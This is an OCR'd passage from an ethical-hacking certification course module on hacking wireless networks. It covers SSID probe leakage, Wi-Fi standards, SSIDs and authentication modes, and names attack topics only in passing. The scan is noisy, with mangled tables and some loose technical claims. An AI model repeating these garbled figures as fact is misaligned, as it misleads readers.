W e t* 0 1 ‫׳‬

f

t

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

H a c k in g W ire le s s N e tw o rk s
Module 15

En g in e e red by

Hackers.

Pre se n te d by Professio nals.

CcrtifM

CEH
EthKal

^

E th ic a l H a c k i n g a n d C o u n t e r m e a s u r e s v8
Module 15: Hacking W ireless Networks Exam 312-50

Module 15 Page 2135

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

S e c u rity N ew s

CEH

S m a r tp h o n e W i-F i S e a rc h e s O ffe r M a s s iv e N e w D a ta L e a k a g e V e c t o r

0 4O cto b e r2 0 1 2

Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones. According to researcher at Sophos, the ability of smartphones to retain identifiers for the trusted WiFi networks they attach to automatically offers criminals a window into daily habits and exploitable information. "A wireless device goes through a discovery process in which it attempts to connect to an available wireless network. This may either be 'passive' ‫ ־‬listening for networks which are broadcasting themselves ‫ ־‬or 'active' ‫ ־‬sending out probe request packets in search of a network to connect to," said Sophos blogger Julian Bhardwaj. "It's very likely that your smartphone is broadcasting the names (SSIDs) of your favorite networks for anyone to see." It means that a would-be criminal can find out a lot about a person's daily movements - which coffee shops they visit, what their home network is called, which bookstores are frequented, and so on. http://www.infosecurity-magazine.com

Copyright © by EC-C(ancil. All Rights Reserved. Reproduction is Strictly Prohibited.

S e c u rity N ew s
inputs

S m artp h o n e Wi-Fi S earches Offer M a ss iv e New D ata L e a k a g e V ector

^

Source: http://www.infosecuritv-magazine.com Our mobile phones are unwittingly giving away threat vectors to would-be hackers (and, for that matter, physical criminals as well), offering criminals a new way to tap information housed on smartphones. According to researchers at Sophos, the ability of smartphones to retain identifiers for the trusted Wi-Fi networks they attach to automatically offers criminals a window into daily habits - and exploitable information. "A wireless device goes through a discovery process in which it attempts to connect to an available wireless network. This may either be 'passive' - listening for networks which are broadcasting themselves - or 'active' - sending out probe request packets in search of a network to connect to," said Sophos blogger Julian Bhardwaj. "It's very likely that your smartphone is broadcasting the names (SSIDs) of your favorite networks for anyone to see."

Module 15 Page 2136

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

It means that a would-be criminal can find out a lot about a person's daily movements - which coffee shops they visit, what their home network is called, which bookstores are frequented, and so on. But aside from being a nice toolkit for a stalker, it also gives cybercriminals a way into the person's smartphone. Specifically, an attacker could set up a rogue Wi-Fi network with the same SSID as the one the user is trying to connect to, with the aim of forcing the phone to connect and transfer data through it. "So while someone knowing that your phone is trying to connect to ‫׳‬BTHomeHub-XYZ' isn't immediately condemning, it may allow for them to launch a ‫׳‬man-in-the-middle' attack against you, intercepting data sent between you and a friend, giving the impression you're talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker," explained Bhardwaj. "An ‫׳‬evil twin' attack could even accomplish this without needing any knowledge of your Wi-Fi password - very damaging for all of those who use mobile banking for instance." All of that data darting across airwaves in an unencrypted fashion clearly offers a potentially huge security hole for an enterprising cybercriminal. In an effort to find out how real the danger is, Bhardwaj launched an experiment at a recent university open day in Warwick, UK. He ran a security demo in which he collected data from people walking by, displaying it for them to see. In just five hours, 246 wireless devices came into range. Almost half - 4 9 % - of these devices were actively probing for their preferred networks to connect to, resulting in 365 network names being broadcast. Of those, 25% were customized, non-standard network names. However, 7% of the names revealed location information, including three where the network name was actually the first line of an address. "W h at makes this even more worrying was how easily I was able to capture this sensitive information," he explained. "A tiny wireless router I purchased from eBay for $23.95 and some freely available software I found on Google was all I needed. I didn't even need to understand anything about the 802.1 protocols that govern Wi-Fi to carry out this attack." Coupled with a portable power source, a device could easily be hidden in a plant pot, garbage can, park bench and so on to lure Wi-Fi devices to attach to it. Mobile phone users can protect themselves somewhat by telling your phones to ‫׳‬forget' networks you no longer use to minimize the amount of data leakage, he said. But, ‫׳׳‬the unfortunate news is there doesn't appear to be an easy way to disable active wireless scanning on smartphones like Androids and iPhones," he noted, other than shutting Wi-Fi access completely off or disabling location-aware smartphone apps.

Copyright © 2012
h t t p :/ / w w w .in f o s e c u r it v - m a g a z ir 1e . c o m / v ie w / 28616/ s m a r t p h o r 1e - w ifi- se a rch e s - o ffe r- rr 1assiven e w - d a ta - le a k a g e - v e c to r/

Module 15 Page 2137

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M o d u le O b je c tiv e s
J J J J J J J J Types of W ireless Networks W ireless Terminologies Types of W ireless Encryption How to Break W E P Encryption W ireless Threats Footprint the W ireless Network G PS Mapping J J J W h a t Is Spectrum Analysis? How to Reveal Hidden SSIDs Crack Wi-Fi Encryption W ireless Hacking Tools Bluetooth Hacking H ow to BlueJack a Victim

CEH

H ow to Defend Against W ireless Attacks How to Discover Wi-Fi Network Using Wardriving J W ireless Traffic Analysis J J W ireless Security Tools W ireless Penetration Testing

M o d u le O b je c tiv e s
1 =

Wireless networks are inexpensive when compared to wired networks. But, theyare

more vulnerable to attacks when compared with the wired networks. An attacker can easily compromise the wireless network, if proper security measures are not applied or if the network is not configured appropriately. Employing a high security mechanism may be expensive. Hence, it is advisable to determine critical sources, risks, or vulnerabilities associated with it and then check whether the current security mechanism is able to protect you against all possible attacks. If not, then upgrade the security mechanisms. But, you should ensure that you leave no other doorway for attackers to reach and compromise the critical resources of your business. This module assists you in identifying the critical sources of your business and how to protect them. This module familiarizes you with:

Module 15 Page 2138

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

e e e 0 0 e e e

Types of Wireless Networks Wireless Terminologies Types of Wireless Encryption How to Break W EP Encryption Wireless Threats Footprint the Wireless Network GPS Mapping How to Discover Wi-Fi Network Using Wardriving

Q e e e e e e 0

W hat Is Spectrum Analysis? How to Reveal Hidden SSIDs Crack Wi-Fi Encryption Wireless Hacking Tools Bluetooth Hacking How to BlueJack a Victim How to Defend Against Wireless Attacks Wireless Security Tools

© Wireless Penetration Testing

© Wireless Traffic Analysis

Module 15 Page 2139

Ethical Hacking and Countermeasures Copyright © by EC-C0Uncil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

M o d u le F low

C EH

Y

M o d u le F lo w
A wireless network is a relaxed data communication system that uses radio frequency

technology with wireless media to communicate and obtain data through the air, which frees the user from complicated and multiple wired connections. They use electromagnetic waves to interconnect data an individual point to another without relying on any bodily construction. To understand the concept of hacking wireless networks, let us begin with wireless concepts. This section provides insight into wireless networks, types of wireless networks, wireless standards, authentication modes and process, wireless terminology, and types of wireless antenna.

Wireless Concepts

*

Wireless Encryption

&

Wireless Threats

||||||

Wireless Hacking Methodology

Wireless Hacking Tools

^

1 Bluetooth Hacking

Module 15 Page 2140

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Module 15 Page 2141

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures
Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ire le s s N e tw o rk s
J J J

* ‫•• י‬
‫* •י * • י * • י * • י‬

Certified

CEH
I U kj I Hwfca

0
Wi-Fi refers to wireless local area networks (W LAN ) based on IEEE 802.11 standard It is a widely used technology for wireless communication across a radio channel Devices such as a personal computer, video-game console, smartphone, etc. use Wi-Fi to connect to a network resource such as the Internet via a wireless network access point

0
« « e Installation is fast and easy and eliminates wiring through walls and ceilings It is easier to provide connectivity in areas where it is difficult to lay cable Access to the network can be from anywhere within range of an access point » Security is a big issue and may not meet expectations As the number of computers on the network increases, the bandwidth suffers WiFi enhancements can require new wireless cards and/or access points Some electronic equipment can interfere with the Wi-Fi networks

«

«

© Public places like airports, libraries, schools or even coffee shops offer you constant Internet connections using Wireless LAN

«

A d va n ta g e s
Copyright © by IG-COUIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W ire le ss N e tw o rk s
A wireless network refers to a computer network that is not connected by any kind of cables. In wireless networks, the transmission is made possible through the radio wave transmission system. This usually takes place at the physical layer of the network structure. Fundamental changes to the data networking and telecommunication are taking place with the wireless communication revolution. Wi-Fi is developed on IEEE 802.11 standards, and it is widely used in wireless communication. It provides wireless access to applications and data across a radio network. Wi-Fi sets up numerous ways to build up a connection between the transmitter and the receiver such as Direct-sequence Spread Spectrum (DSSS), Frequencyhopping Spread Spectrum (FHSS), Infrared (IR), and Orthogonal Frequency-division Multiplexing (OFDM). Advantages: 9 9 0 Installation is fast and easy and eliminates wiring through walls and ceilings. It is easier to provide connectivity in areas where it is difficult to lay cable. Access to the network can be from anywhere within range of an access point.

Module 15 Page 2142

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil

All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Using a wireless network, multiple members can access the Internet simultaneously without having to pay an ISP for multiple accounts.

9

Public places like airports, libraries, schools, or even coffee shops offer you a constant Internet connection using a wireless LAN.

Disadvantages: 9 9 9 9 Security is a big issue and may not meet expectations. As the number of computers on the network increases, the bandwidth suffers. Wi-Fi standards changed which results in replacing wireless cards and/or access points. Some electronic equipment can interfere with the Wi-Fi networks.

Module 15 Page 2143

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

20 10 v s . 2011 W i- F i D e v i c e T y p e C o m p a r i s o n
L

_ J

Source: http://www.meraki.com

Meraki, the cloud networking company, announced statistics showing the Wi-Fi device type comparison. The graph clearly shows that the iPads used significantly more Wi-Fi data than the average mobile device.
32%

f

‫ר‬

2 0 11%
11% 4% 6% 7%

16%

13% |g

1

I I
Android Apple iPhone

I I
Apple iPod

M
Other
Windows XP

I I
Windows 7 /Vista

Apple iPad

Mac OS X

FIG URE15.1: Wi-Fi Device Type Com parison in th e y e a r 2011

Module 15 Page 2144

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

25%

25%

21% 2 0 1
7%

o
Summary: 9

1%
Android Apple iPhone

0%
Apple iPad

4%

II
Apple iPod Other

Windows xp

‫ וו‬III
18%
Windows 7 /Vista

Mac OS X

http ://w w w .m eraki.c o m

FIGURE15.2: Wi-Fi Device Type Comparison in the year 2010

Between 2010 and 2011, mobile platforms overtook desktop platforms in percentage of Wi-Fi devices.

9

The iPhone is now the single most popular Wi-Fi device with 32% share.

Module 15 Page 2145

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Networks at Home and Public P laces
J Wi-Fi networks at hom e allow you to be w h erever you w ant with your laptop, iPad, or handheld device, and not have to make holes for hide Eth ern et cables J

C EH

You can find free/paid Wi-Fi access available in coffee shops, shopping malls, bookstores, offices, airport term inals, schools, hotels, and other public places

W i-Fi at Home

W i-Fi at Public Places
Copyright © by EC-C(ancil. All Rights Reserved. Reproduction Is Strictly Prohibited.

W i- F i N e tw o r k s a t H o m e a n d P u b lic P la c e s

A t H o m e Wi-Fi networks at home allow you to be wherever you want with laptop, iPad, or handheld device, and you don't need to make holes to hide Ethernet cables. If you have a wireless connection in your home, you can connect any number of devices that have Wi-Fi capabilities to your computer. The devices with Wi-Fi capability include Wi-Fi-capable printers and radios. P u b lic P la c e s Though these Wi-Fi networks are convenient ways to connect to the Internet, they are not secure, because, anyone, i.e., be it a genuine user or an attacker, can connect to such networks or hotspots. When you are using a public Wi-Fi network, it is best to send information only to encrypted websites. You can easily determine whether a website is encrypted or not by looking at the URL. If the URL begins with "https," then it is an encrypted website. If the network asks you for W PA password to connect to the public Wi-Fi network, then you can consider that hotspot a secure one.

Module 15 Page 2146

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Types of Wireless Networks

(*rtifWtf

CEH
ith.ul H ‫<״‬ k ‫״‬

Extension to a Wired Network

Multiple Access Points

11B

LAN-to-LAN Wireless Network

3G/4G Hotspot Copyright © by EG-G(HIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

T y p e s o f W ir e le s s N e tw o rk s The following are the four types of wireless networks: E x t e n s io n to a W i r e d N e t w o r k network and the wireless devices. The access points are basically two types: 0 9 Software access points Hardware access points

A wireless network can also be established by using an access point, or a base station. With this type of network, the access point acts like a hub, providing connectivity for the wireless computers on its system. It can connect a wireless LAN to a wired LAN, which allows wireless computer access to LAN resources, such as file servers or existing Internet connections. To summarize: 9 Software Access Points (SAPs) can be connected to the wired network, and run on a computer equipped with a wireless network interface card.

Module 15 Page 2147

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

Hardware Access Points (HAPs) provide comprehensive support to most wireless features. With suitable networking software support, users on the wireless LAN can share files and printers situated on the wired LAN and vice versa.

Internet

FIGURE15.3: Extension to a Wired Network

M u lt ip le A c c e s s P o in ts This type of network consists of wireless computers connected wirelessly by using multiple access points. If a single large area cannot be covered by a single access point, multiple access points or extension points can be established. Although extension point capability has been developed by some manufacturers, it is not defined in the wireless standard. W hen using multiple access points, each access point wireless area needs to overlap its neighbor's area. This provides users the ability to move around seamless using a feature called roaming. Some manufacturers develop extension points that act as wireless relays, extending the range of a single access point. Multiple extension points can be strung together to provide wireless access to locations far from the central access point.

Module 15 Page 2148

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Internet

FIGURE15.4: Multiple Access Points

* r

L A N to L A N W i r e l e s s N e t w o r k Access points provide wireless connectivity to local computers, and local computers on

different networks can be interconnected. All hardware access points have the capability of being interconnected with other hardware access points. However, interconnecting LANs over wireless connections is a monumental and complex task.

FIGURE15.5: Diagrammatical representation of LAN-to-LAN Wireless Network

Module 15 Page 2149

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

3 G H o ts p o t A 3G hotspot is a type of wireless network that provides Wi-Fi access to Wi-Fienabled devices including MP3 players, notebooks, cameras, PDAs, netbooks, and more.
Internet

3G Connection

A
Cell Tower

FIG URE15.6: D iagram m atical representatio n of 3G Hotspot

Module 15 Page 2150

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Standard
A m e n d m e n ts

Freq. (GHz)
5 2.4 2.4

Modulation
OFDM DSSS OFDM, DSSS

Speed (Mbps)
54

Range (ft)
25-75 150 -150 150 -150

802.11a 802.11b 802.llg 802.H i 802.lln 802.16 (WiMAX) Bluetooth

1 1

54

Defines WPA2-Enterprise/WPA2-Personal for Wi-Fi 2.4, 5 OFDM 54 70 -1000 1-3

1 0 6 6
2.4

1 0 0
30 miles 25

Copyright © by E&Cauicil. All Rights Reserved. Reproduction is Strictly Prohibited.

G

W ir e le s s S ta n d a rd s IEEE Standard 802.11 has evolved from an extension technology for wired LAN into

more complex and capable technology. W hen it first came out in 1997, the wireless local area network (W LAN) standard specified operation at 1 and 2 Mb/s in the infrared, as well as in the license-exempt 2.4-GHz Industrial, Scientific, and Medical (ISM) frequency band. An 802.11 network in the early days used to have few PCs with wireless capability connected to an Ethernet (IEEE 802.3) LAN through a single network access point. 802.11 networks now operate at higher speeds and in additional bands. W ith its growth, new issues have risen such as security, roaming among multiple access points, and even quality of service. These issues are dealt with by extensions to the standard identified by letters of the alphabet derived from the 802.11 task groups that created them. Q The 802.11a extension defines requirements for a physical layer (which determines, among other parameters, the frequency of the signal and the modulation scheme to be used) operating in the Unlicensed National Information Infrastructure (UNII) band, at 5 GHz, at data rates ranging from 6 Mb/s to 54 Mb/s. The layer uses a scheme called orthogonal frequency-division modulation (OFDM), which transmits data on multiple subcarriers within the communications channel. It is in many ways similar to the physical

Module 15 Page 2151

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

layer specification for HiperLAN II, the European wireless standard promulgated by the European Telecommunications Standards Institute. 6 Commercially trademarked in 1999 by the Wireless Ethernet Compatibility Alliance (WECA) as Wi-Fi, this extension made 802.11b a household word. It defines operation in the ISM 2.4GHZ band at 5.5 Mb/s and 11 Mb/s (as well as the fallback rates of 1 Mb/s and 2 Mb/s). This physical layer uses the modulation schemes complementary code keying (CCK) and packet binary convolutional coding (PBCC). WECA is an industry organization created to certify interoperability among 802.11b products from diverse manufacturers. 9 This task group's work on wireless LAN bridging has been folded into the 802.11 standard.
9

This task group enhances the 802.11 specifications by spelling out its operation in new regulatory domains, such as countries in the developing world. In its initial form, the standard covered operation only in North America, Europe, and Japan.

9

802.11 are used for real-time applications such as voice and video. To ensure that these time-sensitive applications have the network resources when they need them, it is working on extra mechanisms to ensure quality of service to Layer 2 of the reference model, the medium-access layer, or MAC.

9

802.11 standards have developed from the small extension points of wired LANs into multiple access points. These access points must communicate with one another to allow users to roam among them. This task group is working on extensions that enable communication between access points from different vendors.

9

This task group is working on high-speed extensions to 802.11b. The current draft of 802.l l g contains PSCC and CCK OFDM along with old OFDM as modulation schemes. Development of this extension was marked by a great deal of contention in 2000 and 2001 over modulation schemes. A breakthrough occurred in November 2001, and the task group worked to finalize its draft during 2002.

9

This task group is working on modifications to the 802.11a physical layer to ensure that 802.11a may be used in Europe. The task group is adding dynamic frequency selection and power control transmission, which are required to meet regulations in Europe. The original version of 802.11 incorporated a MAC-level privacy mechanism called Wired Equivalent Privacy (W EP), which has proven inadequate in many situations. This task group is busy with improved security mechanisms. The present draft includes Temporal Key Integrity Protocol (TKIP) as an improvement over W EP. 802.11a represents the third generation of wireless networking standards and technology.

9

802.H i standard improves WLAN security. The encrypted transmission of data between 802.11a and 802.11b WLANS is best described by 802.l l i . A new encryption key protocol such as Temporal Key Integrity Protocol (TKIP) and the Advanced Encryption Standard (AES) is defined by 802.l l i . TKIP is a part of standards from IEEE. It is an

Module 15 Page 2152

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

9

enhancement of WLANs. The other name for AES in cryptography is Rijndael. The U.S government adopted AES as the key for encryption standard.

9

802.l l n is a revision which enhanced the earlier 802.11 standards with multiple-input multiple-output (M IM O ) antennas. It works alike with 2.4 GHz and the minor used 5 GHz bands. This is an IEEE industry standard for Wi-Fi wireless local network transportations. OFDM is used in Digital Audio Broadcasting (DAB) and in Wireless LAN.

9

802.16a/d//e/m (W iM A X ) is a wireless communications standard desgined to provide 30 to 40 mbps rates. The original version of the standard on which W iM AX is based (IEEE 802.16) specified a physical layer operating in the 10 to 66 GHz range. 802.16a, updated in 2004 to 802.16-2004, added specifications for the 2 to 11 GHz range. 802.16-2004 was updated by 802.16e-2005 in 2005 and uses scalable orthogonal frequency-division multiple access (Orthogonal frequency-division multiplexing (OFDM) is a method of encoding digital data on multiple carrier frequencies.

9

Bluetooth is a wireless protocol mostly intended to be used by the shorter-range solicitations

The table that follows summarizes all the wireless standards mentioned on this slide:

Module 15 Page 2153

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

S ta n d a rd s
802.11a 802.11b 802.l l g 802.H i 802.l l n 802.16a/d//e/ m (WiMAX) Bluetooth

Freq. (G H z ) 5 2.4 2.4

M odulation OFDM DSSS OFDM, DSSS

Speed (M b p s) 54 11 54

R ange (ft) 25-75 150-150 150 -150

Provides WPA2 encryption for 802.11a, 802.11b and 802.llg networks 2.4-2.5 10-66 2.45 OFDM 54 70 -1000 1-3 ~100 30 miles 25

TABLE 15.1: Different Wireless Standards

Module 15 Page 2154

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Service Set Identifier (SSID)
SSID is a token to identify a 802.11 (WiFi) n e tw o rk: by default it is the part of th e fram e header sent over a w ireless local area netw ork (W LA N ) the access points and clients

Urtiffetf

CEH
itkN jI lUilwt

It acts as a single shared identifier betw een

The SSID remains secret only on the closed networks w ith no activity, th a t is inconvenient to th e legitim ate users

Access points continuously broadcasts SSID . if enabled, for the client m achines to identify the presence of w ireless netw ork

SSID is a human-readable text Security concerns arise w hen the default values are not changed, as these units can be com prom ised string w ith a m aximum length of 32 bytes

A non-secure access m ode allow s clients to connect to the access point using the configured SSID, a blank SSID, or an SSID configured as "a n y "

If the SSID of the netw ork is changed, reconfiguration of the SSID on every host is required, as every user of the netw ork configures the SSID into their system

Copyright © by EG-G(l1ncil. All Rights Reserved. Reproduction is Strictly Prohibited.

S e r v ic e S e t Id e n t if ie r (S S ID ) ‫י‬ £ The Service Set Identifier (SSID) is a unique identifier that is used to establish and

maintain wireless connectivity. SSID is a token to identify a 802.11 (Wi-Fi) network; by default it is the part of the packet header sent over a wireless local area network (WLAN). It act as a single shared password between access points and clients. Security concerns arise when the default values are not changed, since these units can then be easily compromised. SSID access points broadcasts the radio signals continuously received by the client machines if enabled. A non-secure access mode station communicates with access points by broadcasting configured SSID, a blank SSID, or an SSID configured as "any." Because SSID is the unique name given to WLAN, all devices and access points present in WLAN must use the same SSID. It is necessary for any device that wants to join the WLAN to give the unique SSID. If the SSID of the network is changed, reconfiguration of the SSID on every network is required, as every user of the network configures the SSID into their system. Unfortunately, SSID does not provide security to WLAN, since it can be sniffed in plain text from packets. The SSID can be up to 32 characters long. Even ifthe access points (APs) of these networks are very close, the packets of the two are not going to interfere. Thus, SSIDs can be considered a password for an AP, but it can be sent in clear text and can be easily discovered. In other words, SSIDs can be called a shared secret that everyone knows, and anyone can determine. The SSID remains secret only on the closed networks with no activity, which is inconvenient to the

Module 15 Page 2155

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

legitimate users. A key management problem is created for the network administrator, as SSID is a secret key instead of a public key. Some common SSIDs are: 6 9 9 Q 9 e comcomcom Default SSID Intel Linksys Wireless WLAN

Module 15 Page 2156

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Wi-Fi Authentication Modes
Probe Request

UrtrfW*

CEH
itfciul Nm Im

vl/
*j

Probe Response (Security Parameters) Open SystemAuthentication Request

Open System Authentication Response Association Request (Security Parameters) Association Response

Open System Authentication Process
Authentication request sent to AP ends challenge text Client encryptschallenge text and sends it back to AP AP decrypts challenge text, and if correct, authenticates client
Access Point (AP)

Client connects to network

Shared Key Authentication Process
Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i- F i A u th e n tic a tio n M o d e s Wi-Fi authentication can be performed in two modes: 1. 2. Open system authentication Shared key authentication O p e n S y s t e m A u th e n tic a tio n P r o c e s s In the open system authentication process, any wireless station can send a request for authentication. In this process, one station can send an authentication management frame containing the identity of the sending station, to get authenticated and connected with other wireless station. The other wireless station (AP) checks the client's SSID and in response sends an authentication verification frame, if the SSID matches. Once the verification frame reaches the client, the client connects to the network or intended wireless station.

Module 15 Page 2157

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

Probe Request

.

•vl/ ‫׳‬3 ‫< ־‬
2

Probe Response (Security Parameters)

> VS/‫ ־‬i W ‫יי‬
y C o ‫'י‬ o » Switch or Cable Modem Internet

• ‫\־‬3/ .............................................<
^ OjDen System Authentication Response . . . _ . Association Request (Security Parameters) Client attempting to connect < ‫"״י‬ Association Response o

Open System Authentication Request

Access Point (AP)

FIGURE 15.7: Open System Authentication m ode S h a r e d K e y A u th e n tic a tio n P r o c e s s In this process each wireless station is assumed to have received a shared secret key over a secure channel that is distinct from the 802.11 wireless network communication channels. The following steps illustrate how the connection is established in Shared Key Authentication process: 0 0 0 The station sends an authentication request to the access point. The access point sends challenge text to the station. The station encrypts the challenge text by making use of its configured 64-bit or 128-bit default key, and it sends the encrypted text to the access point. 0 The access point uses its configured W EP key (that corresponds to the default key of station) to decrypt the encrypted text. The access point compares the decrypted text with the original challenge text. If the decrypted text matches the original challenge text, the access point authenticates the station. 0 The station connects to the network.

The access point can reject to authenticate the station if the decrypted text does not match the original challenge text, then station will be unable to communicate with either the Ethernet network or 802.11 networks.
Authentication request sent to AP AP sends challenge text Client encrypts challenge text and sends it back to AP

‫■־־‬ \3/ ................................ <......................................
... . Client attempting to connect _. _ . >
~

AP decrypts challenge text, and if correct, authenticates client

Access Point (AP)

iwllcrl or 1 6 ‫®־‬0‫י‬ Modem lnternet

FIGURE 15.8: Shared key Authentication m ode

Module 15 Page 2158

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W i- F i A u t h e n t ic a t io n P r o c e s s U s in g a C e n t r a liz e d A u t h e n tic a tio n S e r v e r

CEH

Copyright © by EG-G(IIIICil. All Rights Reserved. Reproduction is Strictly Prohibited.

W i- F i A u t h e n t ic a t io n P r o c e s s U s in g a C e n t r a liz e d A u t h e n t ic a t io n S e r v e r The 802.lx provides centralized authentication. For 802.lx authentication to work on a wireless network, the AP must be able to securely identify traffic from a particular wireless client. The identification is accomplished by using authentication keys that are sent to the AP and the wireless client from the Remote Authentication Dial in User Service (RADIUS) server. W hen a wireless client comes within range of the AP, the following process occurs: 1. 2. 3. 4. Client sends an authentication request to the AP for establishing theconnection. The The The (AP sends EAP-Request for the identification of client. wireless client responds with its EAP-Response identity. AP forwards the identity to the RADIUS server using the uncontrolledport.

The RADIUS server sends a request to the wireless station via the AP, specifying the authentication mechanism to be used. 6. The wireless station responds to the RADIUS server with its credentials via the AP. 7. If the credentials are acceptable, the RADIUS server sends an encrypted authentication key to the AP.

Module 15 Page 2159

Ethical Hacking and Countermeasures Copyright © by EC-C0UnCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

8. The AP generates a multicast/global authentication key encrypted with a per-station unicast session key, and transmits it to the wireless station.

FIGURE 15.9: Shared key Authentication m ode

Module

15 Page 2160

Ethical Hacking and Countermeasures Copyright © by EC-COUIlCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks

Exam 312-50 Certified Ethical Hacker

W ireless T erm inologies
GSM
Universal system used for mobile transportation for wireless network worldwide

CEH

ISM band
A set of frequency for the international Industrial, Scientific, and M edical communities

Association
The process of connecting a wireless device to an access point

Bandw idth
Describes the amount of information that may be broadcasted over a connection

BSSID
The MAC address of an access point that has set up a Basic Service Set (BSS)

D irect-seq uence Sp read Sp ectru m (D S S S )
Original data signal is multiplied with a pseudo random noise spreading code

Hotspot
Places where wireless network is available for public use

Frequency-hopping Sp read Sp ectru m (F H S S )
Method of transmitting radio signals by rapidly switching a carrier among many frequency channels

fSm

A cc e ss Point
Used to connect wireless devices to a wireless network

O rthogonal Freq uency-division M u ltip lexing (O FD M )
M ethod of encoding digital data on multiple carrier frequencies

Copyright © by EG-G*ancil. All Rights Reserved. Reproduction is Strictly Prohibited

ip

W ir e le s s T e r m in o lo g ie s

W ireless Terms

Description It is a universal system used for mobile transportation for wireless network worldwide The process of connecting a wireless device to an access point is called association The MAC address of an access point that has set up a Basic Service Set (BSS) Place where wireless network is available for public use Used to connect wireless devices to a wireless network A range of radio frequencies that are assigned for use by unlicensed users Describes the amount of information that may be broadcasted over a

GSM

Association

BSSID Hotspot Access Point ISM band Bandwidth

Module 15 Page 2161

Ethical Hacking and Countermeasures Copyright © by EC-COlMCil All Rights Reserved. Reproduction is Strictly Prohibited.

Ethical Hacking and Countermeasures Hacking Wireless Networks
